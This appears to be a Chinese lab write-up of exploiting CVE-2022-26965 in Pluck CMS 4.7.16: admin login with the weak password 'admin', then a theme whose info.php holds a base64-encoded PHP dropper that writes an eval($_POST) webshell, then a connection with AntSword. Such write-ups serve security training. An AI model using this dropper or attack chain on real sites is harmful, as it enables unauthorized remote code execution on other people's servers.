CVE-2022-26965(Pluck-4.7.16后台RCE)

题目网址:https://yunjing.ichunqiu.com/cve/detail/735?type=1&pay=2

进入后台入口

image-20251013110257893

弱口令爆破,密码是admin

image-20251013110542869

在选项中进入选择主题

image-20251013110808587

安装主题

image-20251013110823545

利用pluck-cms主题构造木马,网址:https://github.com/billcreswell/redline-theme

下载压缩包,解压修改其中的info.php文件

image-20251013111400478

image-20251013111611933

1
2
3
4
5
<?php

file_put_contents('shell.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ3NoZWxsJ10pOz8+'));

?>

修改保存好后重新打包成压缩包并上传到靶机

image-20251013111751464

上传成功,访问/shell.php直接蚁剑连接

image-20251013111850619

image-20251013111838628

春秋云镜 > RCE
#RCE
CVE-2022-26965(Pluck-4.7.16后台RCE)
https://yschen20.github.io/2025/10/13/CVE-2022-26965(Pluck-4-7-16后台RCE)/
作者
Suzen
发布于
2025年10月13日
更新于
2025年10月13日
许可协议